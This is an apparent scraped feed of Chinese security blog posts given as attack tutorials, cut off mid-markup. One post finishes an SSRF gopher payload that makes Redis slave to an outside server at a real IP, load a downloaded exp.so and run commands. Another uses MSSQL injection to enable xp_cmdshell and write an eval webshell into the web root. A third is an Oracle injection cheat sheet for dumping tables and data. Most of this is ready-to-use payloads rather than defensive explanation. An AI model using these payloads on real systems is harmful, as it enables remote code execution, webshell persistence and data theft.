&nbsp;&nbsp;&nbsp;&nbsp;lhost=&quot;122.51.254.197&quot; &nbsp;&nbsp;&nbsp;&nbsp;lport=5555 &nbsp;&nbsp;&nbsp;&nbsp;RogueServer(lport)</pre><p>还需要一个exp.so文件,放在脚本同目录下,exp.so下载地址&nbsp;</p><p style="line-height: 16px;"><img style="vertical-align: middle; margin-right: 2px;" src="http://www.liugongrui.com/zb_users/plugin/UEditor/dialogs/attachment/fileTypeImages/icon_rar.gif"/><a style="font-size:12px; color:#0066cc;" href="http://www.liugongrui.com/zb_users/upload/2020/06/202006031591148706569835.zip" title="exp.zip">exp.zip</a></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/06/202006031591148641562606.png" alt="image.png"/></p><p><br/></p><p>然后启动脚本,监听请求<br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/06/202006031591148757342028.png" alt="image.png"/></p><p><br/></p><p>对刚才生成的payload host部分进行替换,</p><p>gopher://127.0.0.1:6379/ 替换为</p><p>gopher://baidu.com@0.0.0.0:6379@lgr/</p><p>得到</p><p>gopher://baidu.com@0.0.0.0:6379@lgr/_%2A2%0D%0A%244%0D%0AAUTH%0D%0A%244%0D%0Atest%0D%0A%2A3%0D%0A%247%0D%0ASLAVEOF%0D%0A%2414%0D%0A122.51.254.197%0D%0A%244%0D%0A5555%0D%0A%2A4%0D%0A%246%0D%0ACONFIG%0D%0A%243%0D%0ASET%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/tmp/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%246%0D%0Aexp.so%0D%0A%2A3%0D%0A%246%0D%0AMODULE%0D%0A%244%0D%0ALOAD%0D%0A%2411%0D%0A/tmp/exp.so%0D%0A%2A2%0D%0A%2411%0D%0Asystem.exec%0D%0A%242%0D%0Aid%0D%0A%2A1%0D%0A%244%0D%0Aquit%0D%0A</p><p><br/></p><p>然后进行对payload进行urlencode,得到</p><p>gopher%3a%2f%2fbaidu.com%400.0.0.0%3a6379%40lgr%2f_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25244%250D%250Atest%250D%250A%252A3%250D%250A%25247%250D%250ASLAVEOF%250D%250A%252414%250D%250A122.51.254.197%250D%250A%25244%250D%250A5555%250D%250A%252A4%250D%250A%25246%250D%250ACONFIG%250D%250A%25243%250D%250ASET%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2ftmp%2f%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25246%250D%250AMODULE%250D%250A%25244%250D%250ALOAD%250D%250A%252411%250D%250A%2ftmp%2fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%25242%250D%250Aid%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A</p><p><br/></p><p>放到url参数里,就能执行命令了</p><p><br/><img src="http://www.liugongrui.com/zb_users/upload/2020/06/202006031591149131805658.png" alt="image.png"/></p>Wed, 03 Jun 2020 08:56:53 +0800MSSQL DBA权限获取WEBSHELL的过程http://www.liugongrui.com/?id=262<h3 id="前言" style="margin: 10px 0px; padding: 0px; font-size: 16px; line-height: 1.5; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">前言</h3><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">本文主要通过一个案例来演示一下当MSSQL是DBA权限,且不知道路径的时候如何去获取WEBSHELL。当然这种方式对站库分离的无效。<br style="margin: 0px; padding: 0px;"/>我测试的环境是在Win7 64位下,数据库是SQLServer 2000,IIS版本是7.5,程序是采用风讯的CMS。后台登录后有多处注入,因为这里是演示用注入获取WEBSHELL,因此就不考虑后台上传的情况了,只是用注入来实现。</p><h3 id="过程" style="margin: 10px 0px; padding: 0px; font-size: 16px; line-height: 1.5; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">过程</h3><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">首先找到一个如下的注入点:</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1&#39;&nbsp;and&nbsp;1=user;--</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">通过SQLMAP可以查看到是DBA权限<img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006758725426.png" alt="注入点" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006759636410.png" alt="DBA权限" width="1107" height="122" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">创建临时表</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1&#39;;CREATE&nbsp;TABLE&nbsp;tt_tmp&nbsp;(tmp1&nbsp;varchar(8000));--</pre></div><p><br/></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">在WINDOWS下查找文件用如下命令:<br style="margin: 0px; padding: 0px;"/><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006914399687.png" alt="创建临时表" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/></p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">for&nbsp;/r&nbsp;目录名:\&nbsp;%i&nbsp;in&nbsp;(匹配模式)&nbsp;do&nbsp;@echo&nbsp;%i</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">例如在C盘下搜索NewsList.aspx,可以使用<code style="margin: 0px; padding: 0px;">for /r c:\ %i in (Newslist*.aspx) do @echo %i</code>或者<code style="margin: 0px; padding: 0px;">for /r c:\ %i in (Newslist.aspx*) do @echo %i</code></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">使用<code style="margin: 0px; padding: 0px;">for /r c:\ %i in (Newslist*.aspx) do @echo %i</code>的搜索结果<br style="margin: 0px; padding: 0px;"/><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006916324368.png" alt="正确的搜索方式" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">一定要在匹配模式里面加上一个*号,不然搜索出来的是全部的目录,后面拼接了你搜索的内容。<br style="margin: 0px; padding: 0px;"/>使用<code style="margin: 0px; padding: 0px;">for /r c:\ %i in (Newslist.aspx) do @echo %i</code>的搜索结果</p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006917456976.png" alt="错误的搜索结果" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">用xp_cmdshell执行查找文件的命令,并将搜索的结果插入到临时表中</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1&#39;;insert&nbsp;into&nbsp;tt_tmp(tmp1)&nbsp;exec&nbsp;master..xp_cmdshell&nbsp;&#39;for&nbsp;/r&nbsp;c:\&nbsp;%i&nbsp;in&nbsp;(Newslist*.aspx)&nbsp;do&nbsp;@echo&nbsp;%i&nbsp;&#39;;--</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006923550431.png" alt="无法执行xp_cmdshell" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/>如果无法执行xp_cmdshell,并提示如下错误<code style="margin: 0px; padding: 0px;">SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。</code></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">可以使用如下命令来启用xp_cmdshell</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">;EXEC&nbsp;sp_configure&nbsp;&#39;show&nbsp;advanced&nbsp;options&#39;,1;//允许修改高级参数RECONFIGURE; EXEC&nbsp;sp_configure&nbsp;&#39;xp_cmdshell&#39;,1;&nbsp;//打开xp_cmdshell扩展RECONFIGURE;--</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006938795868.png" alt="执行搜索并结果插入到临时表" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/>然后再次执行搜索命令。</p><blockquote style="margin: 10px 0px; padding: 10px 0px 5px; background: none rgb(254, 254, 242); border: 2px solid rgb(239, 239, 239); min-height: 35px; line-height: 1.6em; color: rgb(51, 51, 51); font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; white-space: normal;"><p style="margin: 10px auto; padding: 0px; line-height: 1.5; color: rgb(0, 0, 0);">在执行上述搜索和插入过程后,可以使用<code style="margin: 0px; padding: 0px;">&#39; and (select(*) from tt_tmp)&gt;1</code>页面返回是否正常来判断是否有搜索结果。当没有找到的话,<code style="margin: 0px; padding: 0px;">select(*) from tt_tmp</code>的结果为1,否则大于1。如果没有的话,就换目录,可以试试其他盘符,如<code style="margin: 0px; padding: 0px;">&#39;;insert into tt_tmp(tmp1) exec master..xp_cmdshell &#39;for /r d:\ %i in (Newslist*.aspx) do @echo %i &#39;;--</code>。也可以使用sqlmap来查看条数。</p></blockquote><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">可以用报错将表内容给显示出来</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2&#39;&nbsp;and&nbsp;1=(select&nbsp;top&nbsp;1&nbsp;tmp1&nbsp;from&nbsp;tt_tmp)and&nbsp;&#39;a&#39;=&#39;a</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><img src="http://www.liugongrui.com/zb_users/upload/2020/06/159100694023176.png" alt="报错读出1" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/>&nbsp;</p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">继续爆</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2&#39;&nbsp;and&nbsp;1=(select&nbsp;top&nbsp;1&nbsp;tmp1&nbsp;from&nbsp;tt_tmp&nbsp;where&nbsp;tmp1&nbsp;not&nbsp;in&nbsp;(&#39;c:\inetpub\wwwroot\manage\news\NewsList.aspx&nbsp;&#39;))and&nbsp;&#39;a&#39;=&#39;a</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006941647046.png" alt="报错读出2" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/>&nbsp;</p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">也可以用sqlmap直接将表中数据读取出来</p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006943332664.png" alt="导出临时表" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">然后根据导出结果的路径来判断是否可能为WEB目录。然后写入一个测试文件,看是否可以访问来进一步证实结果。</p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">这里在根目录写了一个txt文件,写别的目录怕因为没有权限而无法访问。</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1&#39;;exec&nbsp;master..xp_cmdshell&nbsp;&#39;echo&nbsp;test&nbsp;&gt;c:\\WWW\\2333.txt&#39;;--</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006954689026.png" alt="查看写入的测试文件" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">然后访问<a href="http://192.168.232.138:81/2333.txt" rel="external" target="_blank" style="margin: 0px; padding: 0px; color: rgb(7, 93, 179);">http://192.168.232.138:81/2333.txt</a></p><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">成功访问,然后就是写一句话</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1&#39;;exec&nbsp;master..xp_cmdshell&nbsp;&#39;echo&nbsp;^&lt;%@&nbsp;Page&nbsp;Language=&quot;Jscript&quot;%^&gt;^&lt;%eval(Request.Item[&quot;pass&quot;],&quot;unsafe&quot;);%^&gt;&nbsp;&gt;&nbsp;c:\\WWW\\233.aspx&#39;&nbsp;;--</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><span style="margin: 0px; padding: 0px; line-height: 1.5; background-color: initial; color: #333333;">DOS命令将文件写入文本中时,遇到</span><code style="margin: 0px; padding: 0px; background-color: initial; color: rgb(51, 51, 51);">&lt;&gt;</code><span style="margin: 0px; padding: 0px; line-height: 1.5; background-color: initial; color: #333333;">应在前面加上</span><code style="margin: 0px; padding: 0px; background-color: initial; color: rgb(51, 51, 51);">^</code><span style="margin: 0px; padding: 0px; line-height: 1.5; background-color: initial; color: #333333;">。</span>成功写入。然后就是进一步的操作了,这里就不概述了。<br style="margin: 0px; padding: 0px;"/><img src="http://www.liugongrui.com/zb_users/upload/2020/06/1591006961756176.png" alt="查看一句话" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 100%;"/></p><h3 id="总结" style="margin: 10px 0px; padding: 0px; font-size: 16px; line-height: 1.5; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">总结:</h3><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">这里一共有三个小的知识点:<br style="margin: 0px; padding: 0px;"/>1.sa用户如何开启xp_cmdshell</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">EXEC&nbsp;sp_configure&nbsp;&#39;show&nbsp;advanced&nbsp;options&#39;,1;//允许修改高级参数RECONFIGURE; EXEC&nbsp;sp_configure&nbsp;&#39;xp_cmdshell&#39;,1;&nbsp;//打开xp_cmdshell扩展RECONFIGURE;</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">2.Windows下利用dos如何搜索文件&nbsp;</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">for&nbsp;/r&nbsp;c:\&nbsp;%i&nbsp;in&nbsp;(Newslist*.aspx)&nbsp;do&nbsp;@echo&nbsp;%ifor&nbsp;/r&nbsp;c:\&nbsp;%i&nbsp;in&nbsp;(Newslist.aspx*)&nbsp;do&nbsp;@echo&nbsp;%i</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);">3.dos命令下写文件遇到<code style="margin: 0px; padding: 0px;">&lt;&gt;</code>如何处理&nbsp;</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; background-color: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); overflow: auto; white-space: normal; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">echo&nbsp;^&lt;^&gt;&nbsp;&gt;&nbsp;123.txt</pre></div><p style="margin: 10px auto; padding: 0px; line-height: 1.5; font-size: 13px; font-family: Verdana, Arial, Helvetica, sans-serif; white-space: normal; background-color: rgb(254, 254, 242);"><br/></p>Mon, 01 Jun 2020 18:15:48 +0800Oracle注入总结http://www.liugongrui.com/?id=261<p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">Union联合查询:<br style="margin: 0px; padding: 0px;"/>  order by 定字段<br style="margin: 0px; padding: 0px;"/>  and 1=2 union select null,null..... from dual 然后一个一个去判断字段类型,方法如下<br style="margin: 0px; padding: 0px;"/>  and 1=2 union select &#39;null&#39;,null...... from dual 返回正常,说明第一个字段是字符型,反之为数字型<br style="margin: 0px; padding: 0px;"/>    第一个字段是字符型,判断第二个字段类型:<br style="margin: 0px; padding: 0px;"/>    and 1=2 union select &#39;null&#39;,&#39;null&#39;...... from dual 返回正常,说明第二个字段是字符型,反之为数字型<br style="margin: 0px; padding: 0px;"/>    第一个字段是数字型,判断第二个字段类型:<br style="margin: 0px; padding: 0px;"/>    and 1=2 union select null,&#39;null&#39;...... from dual 返回正常,说明第二个字段是字符型,反之为数字型<br style="margin: 0px; padding: 0px;"/>  判断第n个字段的类型,依次类推即可<br style="margin: 0px; padding: 0px;"/>  确定回显位,假设当前共2个字段,全是数字型,判断方式如下:<br style="margin: 0px; padding: 0px;"/>  and 1=2 union select 1,2 from dual<br style="margin: 0px; padding: 0px;"/>  假设回显位是2,爆当前数据库中的第一个表:<br style="margin: 0px; padding: 0px;"/>  and 1=2 union select 1,(select table_name from user_tables where rownum=1) from dual<br style="margin: 0px; padding: 0px;"/>  爆当前数据库中的第二个表:<br style="margin: 0px; padding: 0px;"/>  and 1=2 union select 1,(select table_name from user_tables where rownum=1 and table_name not in (&#39;第一个表&#39;)) from dual<br style="margin: 0px; padding: 0px;"/>  以此类推去爆第n个表<br style="margin: 0px; padding: 0px;"/>  爆某表中的第一个字段:<br style="margin: 0px; padding: 0px;"/>  and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name=&#39;表名(大写的)&#39;) from dual<br style="margin: 0px; padding: 0px;"/>  爆某表中的第二个字段:<br style="margin: 0px; padding: 0px;"/>  and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name=&#39;表名&#39; and column_name not in (&#39;第一个字段&#39;)) from dual<br style="margin: 0px; padding: 0px;"/>  爆其它字段以此类推<br style="margin: 0px; padding: 0px;"/>  爆某表中的第一行数据:<br style="margin: 0px; padding: 0px;"/>  and 1=2 union select 1,字段1||字段2...||字段n from 表名 where rownum=1 --连接多个字段用到的连接符号是||,在oracle数据库中,concat函数只能连接两个字符串</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">  通过字段名找到对应表:<br style="margin: 0px; padding: 0px;"/>  SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">  查询第N行:<br style="margin: 0px; padding: 0px;"/>  SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查询第9行(从1开始数)</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">  当前用户:<br style="margin: 0px; padding: 0px;"/>  SELECT user FROM dual;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">  列出所有用户:<br style="margin: 0px; padding: 0px;"/>  SELECT username FROM all_users ORDER BY username;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">  列出数据库<br style="margin: 0px; padding: 0px;"/>  SELECT DISTINCT owner FROM all_tables;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">  列出表名:<br style="margin: 0px; padding: 0px;"/>  SELECT table_name FROM all_tables;<br style="margin: 0px; padding: 0px;"/>  SELECT owner, table_name FROM all_tables;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">  列出字段名:<br style="margin: 0px; padding: 0px;"/>  SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;<br style="margin: 0px; padding: 0px;"/>  SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">  定位DB文件:<br style="margin: 0px; padding: 0px;"/>  SELECT name FROM V$DATAFILE;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; font-size: 16px;"><strong style="margin: 0px; padding: 0px;">实例:</strong></span></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">一、UNION联合查询型注入</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">1、判断注入点类型</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139679108779.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/159013967975313.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139680586297.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">注入点类型为单引号字符型</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">2、order by定字段</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139680879206.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139680835944.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">3、确定每个字段的类型</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: 